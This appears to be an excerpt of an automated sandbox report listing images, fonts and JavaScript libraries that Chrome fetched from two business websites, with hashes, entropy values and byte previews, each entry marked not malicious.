                                              SSDEEP:768:2JarQw4iN28JSh6LnZn/2dbw7dP3KnouGgFQQ2+134WmC1ADwWAs/6ifDnFbMAoB:2Ja9N28gh6LR+d07dP8RZ2emadWAs/Pe
                                              MD5:E976A51CE5A776EDB7A5FAABB6D19F65
                                              SHA1:7CCF7A4A60840587146FFFDBFF66C88513A20326
                                              SHA-256:23CC8129244482B604729FE1B874EB079A26FB29172EB522B87B902534F2162C
                                              SHA-512:0883251286D375BAC341B1EF6AE950D41D0DA363F5093D03A147675777CB7FC1B3FD3FD9BE5D9CE3B34D7D48CF0F7E102A9DE4458ABB9159E50694EB13DFA8D8
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF...WEBPVP8X..............VP8 v........*....>.h.T)%8=...+...gns..1.4..?/..^....x>D.......l.W.<Z.;....|.3.rt.8.V....w...'.O..o..C.-.?......._.OD&....>..M."..]...........{.c.........~,.......?.\......B..Za.?D.....a..@...b0B.k..-...+&L......K....B......;....V(....k.T.. ..2..e.k..I.....':=...x_`.l.gL(^Nv}VoXG."....6I...|E.[...[.r. I.I..A...+j...S.G......4....k)......x....5E.|..O.x.._..+..;.s.!.`......W.6.U...ww~+g.<yS...~x.;.A.......'.\&..../..8.......9..-..H.HB..Y...f.51R..$)._...KO2W.~tR.......<..0....6....../...g.:z.|...q.....^.w..OVt.1P...m.Tb....e..T.9........kH...{|.h....'...vu.`....w.8......u.W......|.r.%..rM...rfz.......C.FJ.OR.....T..37l..96.6-M...~f:.f.......~.l....f.LI......p.....,.J....s..........0.%).U`%.UC.GR.%...mV..y...s.x?w.v]A.$...?..'.Z..[g.)."en:......y..!.b..v.V.].E.....s....A./..5.....<......s2....i.%.j..4%O+.e.......X........."6p.U&...#..X...L..}.....}.rOu..).B...w.|.0.....^iL_.F>...@..j.$Q9..}...c..5k..c`...`..v..R.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):11226
                                              Entropy (8bit):7.517175595162412
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKw5rPN97CBrz3UWSUYGi/SwAvZbMPC01q7mrtC:4YNg75rl58noGaMmPL1jC
                                              MD5:7A3BE8D3180DCA255A40AA262DC6B9AA
                                              SHA1:098672821F9BDC1BB8176023E90FBE0DDB413CB1
                                              SHA-256:AD47628C8B643BA9F32AE94425CAEC2B0EC95B99780C5D61BE39A4EF220FF37F
                                              SHA-512:CF65838E6D8ED3FF011F52543563351D3B6E42AA4BE82B2223C976CAC0DBA2B1D2C9007580AE842BE5E328DA208E1E4AF20823C7785207F64484E95F7116C3B7
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/61/632f1e10440013f57409520739577600.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 60 x 38, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):701
                                              Entropy (8bit):7.565148480818325
                                              Encrypted:false
                                              SSDEEP:12:6v/7s/6Ts/WR7gE8pqLvKTHkcfDWcSboL7SM4EOAusnsal6U48/rcumCcz:l/6hgEAqLvKLLfKcSbcXOAuMsall48/o
                                              MD5:8B4392A11C5101F73C0C9EEA0166B17E
                                              SHA1:1803B394A05843D2CCCA8D188D129943A966BA23
                                              SHA-256:8338AACB933F5A3309C8D0EA8D45C3ED78B5450A7E1A2A8471544DABDF354364
                                              SHA-512:EB3A105F6BA24DF228F5A7C81A9C6132A72C1BD7192B64D6EF02C4E867F3B1851DACE06AC6C938D145660553562B9739307F4272880CA93C92373023CCBBBED6
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...<...&.............pHYs.................sRGB.........gAMA......a....RIDATx..Qn.@......U ...O!'.oPnPn@o`z..!..z.p..'T..QS)j...EJ[...$!..!...%.B..3.;;6....Z...7....H..rQ..G..|..' .5.Ea..W.x..U.P..9.~...w..O..h..Ic.*7...k4....... y......5.n.c1..DXS...L.L>..Q....V`....N....-..G"[.E0.......d.........Fk.m,$..R..a1s.. ..%.....[..Y%UX.......*.......)...>.q.}....Z..A..k*.Q.._F....<....c.......~,}028...........rG8..UY&.....t. ..I.!{...>..+.'.5.........vN..u.c.VT..]i.i..=mF...i..0.;X......_E.TS..W.h.N.....!..3{.p......<...(.2._..x..Q..re....<...f..f].)Xj.(.A....+..'....<......`Qv.....i...?.G..PbCn.........a.n)./. {4&/Hd..y\kB..?.......O....IEND.B`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text
                                              Category:downloaded
                                              Size (bytes):21369
                                              Entropy (8bit):3.9066812167163114
                                              Encrypted:false
                                              SSDEEP:384:DvtTVt9XbRPxdsDvvpApAQMadC9zuf+31UiBbZ7cZYwO7AfR:Dvt5t9XbRbsDv6FSIiH7LK
                                              MD5:D0D327467EA4897F49D5165D19E901F6
                                              SHA1:976416D87A1A310A0163EABFCC4D183DA6FABEA3
                                              SHA-256:2C7F5107A6A503F88B4D25C90007DF598C0F9041AF387DA627DFCF991C68534A
                                              SHA-512:C35C8E09C800993F602C658B1B1DC1EADCF97D22BF84C4F3AD973ECF0FD4994CB99A74F4A54FC538A20B071FBEBE12C0520E24C766AA22DF9091E0F3E497D26A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/ScrollSmoother.min.js
                                              Preview:/*!. * ScrollSmoother 3.11.2. * https://greensock.com. * . * @license Copyright 2022, GreenSock. All rights reserved.. * This plugin is a membership benefit of Club GreenSock and is only authorized for use in sites/apps/products developed by individuals/companies with an active Club GreenSock membership. See https://greensock.com/club. * @author: Jack Doyle, jack@greensock.com. */..!function(e, t) {. "object" == typeof exports && "undefined" != typeof module ? t(exports) : "function" == typeof define && define.amd ? define(["exports"], t) : t((e = e || self).window = e.window || {}).}(this, function(e) {. "use strict";. function _defineProperties(e, t) {. for (var r = 0; r < t.length; r++) {. var n = t[r];. n.enumerable = n.enumerable || !1,. n.configurable = !0,. "value"in n && (n.writable = !0),. Object.defineProperty(e, n.key, n). }. }. function r() {. return "undefined" != typeof window. }
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):56572
                                              Entropy (8bit):7.995511617677945
                                              Encrypted:true
                                              SSDEEP:768:AKwi/qFsohxhnWNxFCYrZEHr8j+jo4S/2Z1Ps1KwoqRSEI3JcGjehAcA9/S3Zgq:DwAqBnWNxFdZEwZ40o1DcGjehi9/kr
                                              MD5:79DCBA8281FB8546D0F14592E97F5019
                                              SHA1:5B0221A0233F6D128697298F209157CF727FC47D
                                              SHA-256:567DE5EA4176C023EDBDE63467E87663E4AC073FCF8C249A2BA5298C8F0ADD0D
                                              SHA-512:139DDAFDC48D99D6EB9F9159AEF2C2BC26544217C0B92CE80184C2C4A4A7903815E57DC10D76A11C2DE417200A8A801F7A802EBB2682A3538583482C1842488C
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF....WEBPVP8X..............VP8 .....>...*....>.n.R.&%+.Q..p..gn....o.S.....z.K......7.:t...Z:]...6?n................Ps....<../.o5..}b~....c.^...S.......q}.?.z......'./[....7.7........i...................{..............R....o...zn..._........o...o.z..Y.w.+.......~.{.....%..p.|j.....R..5.V.F.5J....[a...+l#_..mgQ...U7...;..mZ.../M\..rQ.C..... c...#.<.;O...?..g0.U.l......99XEg..]....|..B..jY...w.FmR.G..6.b.6:..M^...%sJ.6r....S..z.>'.!..8K*!Kx..v.).L..l...F.1.!.B..D...h.Q.xI..#..%D..w.... ..1...7;..J....2....G.,k....H...Jn....v..=.....S.;...u.....V.JQ....y....]..i..5.....!.r...|i\.+tp..N.?.../.......i-.....Z...h..+p]......Ly...j6.4.F.u(.Rj......z|m...f...k..K;?T.E:...^V....G.r..,.zTNqs..p..D.T.w...%+......K`.t.C*%.en..i....w..VW03.].jVJ.k......P..2....Q4....=j.o..'D.....*./..8lEB ....w".C.......w.E..O.!.uU./.-mm.m..J|{...U.....J..w.J.9..`.n.Z......../.c@B@.Q..gu.lB..e...J..l.c............$......<...scr........H...B@....\.Dj....l&j2..P!;.._.B
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:downloaded
                                              Size (bytes):10295
                                              Entropy (8bit):7.943296651254659
                                              Encrypted:false
                                              SSDEEP:192:ZIIHUCD4wato8M+hftsxdlRjwFgoS1sly/2k2C+:f0wSo8MofclxwF5Es+2k2C+
                                              MD5:3B893BBE834C341F5FC174662D2BDB9D
                                              SHA1:72FC8FB7609EB9C2FC23A4C59FB82D5004716779
                                              SHA-256:916C10C678B8441363A9183ABDD12EBAAE52E6918FFCE25D6CCEE401AA40681F
                                              SHA-512:51371FD101E811F016B0BFFB334391E822B441FC38D5589281899D22F9E42DC9E3904A15BE43A692991AB733623B610F364FB0FAF067AEDD9387DEEC677B871D
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/imgs/logos/lonestargroup.png
                                              Preview:.PNG........IHDR.......P......N.....CiCCPICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O......:..L..$R...J5e?
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65284)
                                              Category:downloaded
                                              Size (bytes):142399
                                              Entropy (8bit):5.249945129624385
                                              Encrypted:false
                                              SSDEEP:3072:8Jv6judkJpInxfpoy9v8cIWyUaV4y+rGHJEyEfBNK/MxF:8Jv6idkJpInxfpl9v8cIWybV4y+rGprA
                                              MD5:3ECE71448BBA0FB694F7A45192846F96
                                              SHA1:3ABB9F361B43D2E733A4703BAE6ACED45B3C8CBF
                                              SHA-256:FDED9EC5820AD165D5B36A6F23FAC4B0F2D1B32E714D651C081122442C0DF277
                                              SHA-512:1166ADD3FC24119B44ECE10D846EF4D13FA39ABA474AD192EC2A87500CCA5B93333675446BD59F6FECC98C5E21A174A03135A58B12F9160AA18F1E4F02589A5F
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/js/swiper-bundle.min.js
                                              Preview:/**. * Swiper 8.2.2. * Most modern mobile touch slider and framework with hardware accelerated transitions. * https://swiperjs.com. *. * Copyright 2014-2022 Vladimir Kharlampidi. *. * Released under the MIT License. *. * Released on: June 1, 2022. */..!function(e,t){"object"==typeof exports&&"undefined"!=typeof module?module.exports=t():"function"==typeof define&&define.amd?define(t):(e="undefined"!=typeof globalThis?globalThis:e||self).Swiper=t()}(this,(function(){"use strict";function e(e){return null!==e&&"object"==typeof e&&"constructor"in e&&e.constructor===Object}function t(s,a){void 0===s&&(s={}),void 0===a&&(a={}),Object.keys(a).forEach((i=>{void 0===s[i]?s[i]=a[i]:e(a[i])&&e(s[i])&&Object.keys(a[i]).length>0&&t(s[i],a[i])}))}const s={body:{},addEventListener(){},removeEventListener(){},activeElement:{blur(){},nodeName:""},querySelector:()=>null,querySelectorAll:()=>[],getElementById:()=>null,createEvent:()=>({initEvent(){}}),createElement:()=>({children:[],childNodes:[],style:
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):63024
                                              Entropy (8bit):7.9966336776389175
                                              Encrypted:true
                                              SSDEEP:1536:z58jIhvW7v8xzcbirPBkerpnYTb0u+XkmJBwtK02BsNk:nvwU9pPqe9niz1mHBsi
                                              MD5:792E6EB1BAA62D95DF09F5978E61E586
                                              SHA1:A9A26541EBC67BC4EEFFFF8670D9C1E5EBDEA7F8
                                              SHA-256:4C7CA2B2C0DF8E7675C72A9803E28D57751A32D1048DCA4C6145AEA2AB6FDFB4
                                              SHA-512:33C69F618EEEC16387366AAB03E0ED70532EE3736F2951368276C2E0C08DD57E4A480A47B1B81EADD12EF1079910118A95ECB95C479672A631E4815C0B67372A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/22/99d0794491cfd3b80cd8a673e31ef7e3.webp
                                              Preview:RIFF(...WEBPVP8X..............VP8 ....PA...*....>.l.Q)+?....{...H8.x......R..........+.......g.....m....F.k.+..M9.....I..../..-.y..n:.6.q..{.....................{.S..M..W.......d....?....C....!..f...=....A..<..+..X...#....?c.O...{..y.'.w.~..> ...#.....,../N%,X..K.q..A........0.o.yVP..B.uhJqW5.n..^..lG\..{}.....P#o)....I3..B+^.w/.I.#..........K.V-...8.....-..S&....F,.;....=.g.x4..=.5f.9ee{.......Q...r....?....Q..mV:...U...e..w......>.h..p.|4..wi..!.3..i.NP?^+5|.&.8f.aD_.4~.4.......-...k........#:.\XJh..p.Q....+DL."~$t..'/<... (.|jX1D......fr.$.2....i%?.. .........G.-.DM...=L +|..R..3...z.......3..Z..0....dL..$...n...K.y..B.......i".0.k..ko.V.$..~_..F. _.#..".J.......X.,v).y/. .8I.......#.....+.....Y9%.....k......n....X...d.I..y......V..o....2...b9d@..3X{......P3c..~..o.5.V.&..E... .^H...`5.W....J.r....T...~k..Y)b..._x..{.41c.?l2,.A.<.h.|...3e...%.]<......t.u.F.AD@C......O.m.. {`.\Q............H}T.l......}Z...q~...W..@o{.:.`..S..;@P.Q..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):44502
                                              Entropy (8bit):7.994815034694258
                                              Encrypted:true
                                              SSDEEP:768:cQCJr/3/NjHv4T/BpIHTZMFMKYGTTonjlhO7umfXv6znmi0eOr+Bmx5EaIU7RfG:cQ8rHNjHv4TpkZiYGUq9ff6z+r+Qx5d6
                                              MD5:F7147B4BD7924DD7B0609049F3BBD556
                                              SHA1:F960917D6B478EF8EDD989860AF51EAE367EED3D
                                              SHA-256:CAC90EA67E46423A634B3751DC7937DAAA029B08653F10B9719EFD1380285D7C
                                              SHA-512:A378C4EB99A9BFF93F7A7F0A118AE4B20CBED4DDA839F5CA3E43F2E8CF0F9B1CFA4F53E7798F59362F0222A360A0FE85BD6FE3D40CABCE8D77F8F1D0BE02AF16
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/18/d4358b3300881d66d5be0da1f9c2ed79.webp
                                              Preview:RIFF...WEBPVP8X..............VP8 Z.......*....>.p.R.&./..za...en.1...R.....}..sz.A..y*t.......L..\..zrq....z.g..8w.c..~....4^Z_..7.'.O..../.~..i......w........O.)..*.....{......z[.?.?W..=y...?DO...~..D...@S] )....H.k..5.D.@S] )....H.k....t...@S] )....A.o..A4.4.]...x....A7.J..6Yu.~..m...*../}.."6>H....KT....Mt...$y*......Jc ..9..+.M..j;.[..Ot...D.p...|.3..t.k.g...E;..>..{.L,.&...*3...41..q|XS...:./..[.k......+..=%.....Gk.ls?.b\w.r*.29...q.M d}.i..=...&..l..-)t.......L,.X.....k....r..b...B.];.`1..+b{..O.2..1...mR$lC.T... .C......-....6....%........%.D..H.Y4L,.@.&....,m?......./c.@X.gBy...2....D.4_...k..5.)%.....W*.R..M..D$. p..0..cAW.66...2..Y'.Mt.[. Vd.....R.h.!...=..vt......J...6..2.\<l....13.../i..E...y....@,'............]....)4ws.'.].......h.Rp..W.....g7*....=....r.......GP.../..[RGP..A..6I..].....:.a[.......)..y.......Q..?h..Y......~.u.yx...6%^.a8..p.]........p.....)...*..?7...gJ.Mh..D...y.6.....0U..g.+i......Kx.l+eH...H.k..8h..PmT.p.Su._..R.o8..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:dropped
                                              Size (bytes):23822
                                              Entropy (8bit):7.98989858786577
                                              Encrypted:false
                                              SSDEEP:384:qLBB2Kqy73eDYdfTCokaCrwHAvoDIP1Slu7YK4DUXK2vYbbNRn3DsIEAUPAa/Bjo:sT2e3MYQnrSDI9mcYbcKbbfdkPAcBj3Y
                                              MD5:4E7AF0F169B339487C34A7C5EF6D3A10
                                              SHA1:64227414304E74EF6D65849274EB5AFF6C6C621D
                                              SHA-256:A6A2A7EE88D81799A1088B004FC9769EC75AD3F40B1758228CB902124C45B6E3
                                              SHA-512:B632738315D7D406026AF1EA25F36B21FEABC5ABF337ACA9225CF255FABB7EF43EA1FF4BC2A7045B2117D41762AF44A7E4F300DC078C2497D52762CA8130D57F
                                              Malicious:false
                                              Reputation:low
                                              Preview:RIFF.]..WEBPVP8X..............VP8 .\..p....*....>.p.T)&*5"0....g.....y.........f.y........Q.y.o..h....y.t..6*k....fT?4....Bs.....c..../....C*...w............w..?..%..,m..?.N....[..X......w...>.J.|..[*...*..T2..T]a....J(y../?...T2..T]l.d (....l 3..]6...{..K7.n.-..,...i'.....xk"C9. (...b....B.....|.7..p....B.U..Ha.W...vm.Y.{t...=q...v...AmdJ/.....,o..G..-..=.../Vv.JDF..G........vf.W...vm.Y.{t...q..T...F<e.QQu...|.kf.."T...."z....7.WZ.....\.gO>.c .........H.'gEpN..f.%..O..6BL..j.B.vTT]..vTTa@2=..V...Yz..|..*.&.3.pS....M.F..:..&V.\...vm.X.H.'g=.=.....R..f....U..."K. /...../mm.Q.r....K....S.P.L.(F......#..on.VtY..l^.%pE]j5..Mr.s./....s.g.. ..^.... (...V#xM..'6.*./..>.._.n....8|.[..T....:..h.o...?.'.>^...TH...E...../m.'.%P'...B......k...@.T...P6.1?..B...H...'^..m....s...V.a..f./....|8r...U..8[!.....s.&...3.#D.(.....4............;|....I#.%pN..A..8*.~.m-EP.S.J..z%.9..K)..K..oh.a..P9..[o....4}..G.o)...N.M....R...RvtW...c,.=.....,./.D.T2)^|....w..v.....Ofn>r..5
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                              Category:dropped
                                              Size (bytes):600
                                              Entropy (8bit):7.391634169810707
                                              Encrypted:false
                                              SSDEEP:12:6v/7OEUT9vceKKNtY3kM8O+mucROzZbJOAjPBE2Iq8AnxT9:bTdcVIM8tfHzzjy2IdKT9
                                              MD5:0F2A4639B8A4CB30C76E8333C00D30A6
                                              SHA1:57E273A270BB864970D747C74B3F0A7C8E515B13
                                              SHA-256:44B988703019CD6BFA86C91840FECF2A42B611B364E3EEA2F4EB63BF62714E98
                                              SHA-512:3EA72C7E8702D2E9D94B0FAA6FA095A33AB8BC6EC2891F8B3165CE29A9CCF2114FAEF424FA03FD4B9D06785326284C1BB2087CE05E249CCAC65418361BFA7C51
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...0...0.......1.....gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.........IDATX..M+.Q.....&/....&......6...|.I..).o.I.X..#.@.bb.D.'5....m...=..y........{....<.P..;.H......f...3l...M.I...j2.....3..1x..S......9..<m...E.'F'.. ...M.j...C..c.5.-..F..3H./F!.."V.e.i.}.Y....../.rw...@...].rp...`CQo(.....J...u.".!E...$.^$...k....b...*.@.^.;.u5.*.......H/Q{..$..'..........w...r.+xS.uR..J.......GD.O./.. G7..l...J.t.3.S...N.7...e..s.-Jlj)..5E....E.;8w4.k..=.li.G...1.c....p,T6;....1.oW.%.2,..Z..a...*m.s}T1F....Hr.1......<x0.....-.i......IEND.B`.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):4618
                                              Entropy (8bit):7.951391150470394
                                              Encrypted:false
                                              SSDEEP:96:NQZqXB59Wb6feyrqbrvMk3RfBNh+sVaCOpnDRo342i7RLcSfXy0W:NXfEY2rkkhf4hte342iZHfC0W
                                              MD5:177F4FDD95C894DB0ECC771AEF1CD19C
                                              SHA1:255DE4F9A8F3FDA48A7DD6EA30D0610C4C333A50
                                              SHA-256:DF45A9C1B96A0CC3FB201F3E950CBFE8B80CB53C797EBF3A6FD6A4B07490476C
                                              SHA-512:BFCBB9DEF1B3597A19ED90F18E73773A2D71C2FE6A1D4CF856825010A03E5F5B91AC2305CAF69502C5AE64B12FFD8BB28571DA69B027E5BE20C84C9D74C01557
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE...v..XUr]Zw...[Wu......A?W...==T...;9XXZv...CA[VXr.....??\TSo?<Y<9O...w.....67T..EE`..t..CA_y..83J8?XJFb12H........UW|..........7>_.u.QPlQVv.........n..-,>...SMh^]rKIf.6<N.|.F7N.............7Df-:Y...}..v..+2P..[_{r..QYkw.......^IV\Vf......................ACS......uq..t..d...c]}QPb...........K@V...[Tneu..o..l..lhx.|....@Bg.........s........}...L]yQ\.l~.................w....?Ku.._p.....g.......gXm....V}.d.u.......qR\.}........yWq..Uh.....cq.......n..i...bf................iy....3Y.Eh..`.........t.....IDATh...S.Y.....4].Mu....^#,.P`...Z.).H...........M2..h..%&.d.d2[I.n../..q.....U~...9....a._.P3,!.....e.0.]U..a2|.B...:...(.N...!.*.....B .....M6k.*..Rt.l2.X...dbe.aW..CS.k6........~...B.F..CQ...DX..%I.K........:5.%/V......3Bl.....s\Yga.,[..M.4A.....4Z.!.......8........E....!.-dr.ha ..h..HR.W!..!....C...i..G...%.7.q..y..@.nN..M.+..@.......iQ$./.....[!.....-...#H.`:.VD.E.8.'......p^.Y.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:Web Open Font Format (Version 2), TrueType, length 18588, version 1.0
                                              Category:downloaded
                                              Size (bytes):18588
                                              Entropy (8bit):7.988601596032928
                                              Encrypted:false
                                              SSDEEP:384:WF9srt3EJfKy7iOpqErJeqQhzsaZqPTPabcoqYdBTKYPvS9BlTf:Wn6UhKYieqAiPQTwclYQLlTf
                                              MD5:115C2D84727B41DA5E9B4394887A8C40
                                              SHA1:44F495A7F32620E51ACCA2E78F7E0615CB305781
                                              SHA-256:AE0E442895406E9922237108496C2CD60F4947649A826463E2DA9860B5C25DD6
                                              SHA-512:00402945111722B041F317B082B7103BCC470C2112D86847EAC44674053FC0642C5DF72015DCB57C65C4FFABB7B03ECE7E5F889190F09A45CEF1F3E35F830F45
                                              Malicious:false
                                              Reputation:low
                                              URL:https://fonts.gstatic.com/s/roboto/v32/KFOlCnqEu92Fr1MmEU9fBBc4.woff2
                                              Preview:wOF2......H........ ..H8................................|.`..J.\..<........-..Z...x.6.$..0. .... ..S.7.5..K!.;..../.`..Sn.J.e.52P.(.....=9....f.....$...*.fZ.p...N...t....6.lfS.Ju.i.o.g..<....T"O.o..4..4....M/N.>.K..."[.P...W.u.>]................A.9z....IN^....z..Y.{....m=...+X9<?.......(IA*G8rD....52L0.p .EJ..p....=.......[U...pz..g...../L.U.......P..W.U..q$L..6......C.M.0..R..........D(.ilX.Y..SZ.R...Q..j.6.@\."|.l......3....,.T.....L...ap0......6.j.\&O.z`*.$.*_+vwnr...,....?W.T....!.J...L#%.......A}........\.....l...:....U..u.J.0....O......&.!.)4.V..:.}.0f....:W......?U.....%...b...!....yA.sw.....5..T .}{.t!F.G....{"..pQ.S.v.S....t......U.Y|.v.@....|..(..V.........^....../.7......K......J.Uq/L.T-.`.O........;........';vWq.+....J...J..p.....sB`(1LC.k....?Z{...v>dS....F..........\.....UetU........6.V...vE....._.../...%.q...^.l...>^.z..l..p....j..@H...`X.p...KQ. .<@...I...BF.......L..6...y.2=.P....8;..@`.m.....R.B.L.r.*T.T..l@.6.Y....}g.....F.n...
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):21564
                                              Entropy (8bit):7.817166207653922
                                              Encrypted:false
                                              SSDEEP:384:4YNg7IdbtbSzoHEMEcNZ3ums7jnELCfOAHMifC1Cteq:4YyMddSMHNEW0AQHMif1eq
                                              MD5:A8E43BD8CDA343E9F40C400E5CE30BB6
                                              SHA1:E5CF1AE10723D911AFF24DC877BBCE66BFAB3B72
                                              SHA-256:F8C1CD123D33E35C755438C21A0586ACFC089C1416AF857EF3BDA7B0AAE60449
                                              SHA-512:B2DDBCDE1243C9951DF83ED337873B1ECFB9ABEF41B33D92256BACCA39CD19F1DE941982DA28D2C82A21F03DA1D838915E7C160A4CC3DD444332E2485F26440A
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):13585
                                              Entropy (8bit):7.630350603696567
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwBXBjA5rXdf9NhCVrHRcKhGaHXGiCWyZAsR2aFm0d/t3Mx8:4YNg7VBjGPhCZHhhHXTCNR2aVda6
                                              MD5:24847E030BEC9DD8DC0DED3FAE435939
                                              SHA1:2A252584FD6B4BA5F0062F95CF9366B446EDCC79
                                              SHA-256:F30769594F56B317CAB3758242A5AA92C36D4F70290083ED0D94E2E5276FEFE2
                                              SHA-512:07605946E50B27A8489A1097CEBC11C249151A5B17B6EABB2AA76676E362E5FECA11B29ECCA3069AA3430D59C5C03DE1C36D1B585AF2A5FE8A8565DB2C0258C0
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/10/76ce234168d48cff9e93dfcfb7039102.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (431)
                                              Category:downloaded
                                              Size (bytes):1823
                                              Entropy (8bit):5.031070214331243
                                              Encrypted:false
                                              SSDEEP:24:u937TTvMe9WBZ5JHqvAGbU79aeOJjqGGAX13zQ6uODRoAQJ+mKmAlTUSc:u9TfIBNHz79aeUjqhqexfQdgSc
                                              MD5:E4523A8669C828C343D20874C5CA1125
                                              SHA1:67365A4AEE10FC82036D81D5A039F99F5F9117FB
                                              SHA-256:5D834E511ABBEE705EDAC80D4C3AE0900B7096D2426B42EBDE541CC77BDB9E9C
                                              SHA-512:3ED663ADB0B103D5978D920AE754AF637D6A801C4BFDA49D723E429C2B60AC4D54DF58A818FF088E850EFE11A616F53BBCA495AE485090707BF79825DC1B9485
                                              Malicious:false
